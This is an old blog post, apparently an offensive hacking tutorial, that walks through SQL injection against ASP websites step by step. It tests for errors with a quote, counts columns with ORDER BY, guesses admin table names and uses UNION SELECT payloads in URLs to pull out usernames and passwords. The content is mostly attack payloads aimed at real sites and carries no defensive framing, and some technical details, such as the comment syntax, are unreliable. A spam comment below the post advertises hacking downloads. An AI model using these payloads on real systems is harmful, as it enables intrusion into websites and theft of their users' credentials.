Sunday, September 16, 2012

MsSQL Structured Query Language Injection



Tutorial provided by





The SQL Injection on ASP is same as on PHP...but a little bit of changes are made...

So first of all we will find some site that is vulnerable and is on .asp

So assume that u got a site with the name of

Code:
http://www.target.com/

Now find page where the site is vulnerable to SQL Injection...

You can check the vulnerability by adding single quotation ' 
at the end of URL like


Code:
http://www.target.com/product.asp?id=13'

If u get this error...


Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'department_id=1024''.

/deptdet.asp, line 122

Then this means the site is vul to sql injections...Now we are going to find the columns in it...Normally we use -- at the end of string but in this case we will be using #

Code:
http://www.target.com/product.asp?id=13 order by 1#

Suppose that the site has 10 columns...when you will use the query "order by 1#" (without double quotations)
You will not get any error...the page will load normally...but when you will use the query "order by 11#" (without double quotations) you will get an error this means that the site has 10 columns...

So we will have an error on this query


Code:
http://www.target.com/product.asp?id=13 order by 11#

But when we will use this query, we will not get any error


Code:
http://www.target.com/product.asp?id=13 order by 10#

This tells us that the table has 10 columns

Now we will write the query as...


Code:
http://www.target.com/product.asp?id=13 union select 1,2,3,4,5,6,7,8,9,10#

So now in next step we need name of a table to get number of largets visible column from all .. let me explain bit , like in simple sql injection we use union select 1,2,3,4,5,6 -- and we get a number to get information from site , in this we need a table name to get that number of visible column ,

So to get that number we are going to add name of table after union select 1,2,3,4,5,6,7, ..,10

In this scripts of getting table names dont work most times i tried some of them so we will add name of tables manually normally name of tables are " admin,tbladmin,tbl_admin,user,users,login,info,email" etc . Suppose in the site we got admin table that is visible. Now our url will look like:

Code:
http://www.target.com/product.asp?id=13 union select 1,2,3,4,5,6,7,8,9,10 from admin#

After this we will get number of largest visible column which we can use to get data from site. Suppose we got 3,7and 6 columns that are visible...

So now we are going to use 3 to get information now all we have to do is just put the name of column instead of 3 in string and we will get username and password ,

Now our URL will look like


Code:
http://www.target.com/product.asp?id=13 union select 1,2,name,4,5,6,7,8,9,10 from admin#

Suppose we got a username instead of the number 3.

and then change column name with passwords column name
you will get the password ;)
URL will be like


Code:
http://www.target.com/product.asp?id=13 union select 1,2,passwords,4,5,6,7,8,9,10 from admin#

1 comment:

  1. ~ Learning To Hack >>>>> Download Now

    >>>>> Download Full

    ~ Learning To Hack >>>>> Download LINK

    >>>>> Download Now

    ~ Learning To Hack >>>>> Download Full

    >>>>> Download LINK

    ReplyDelete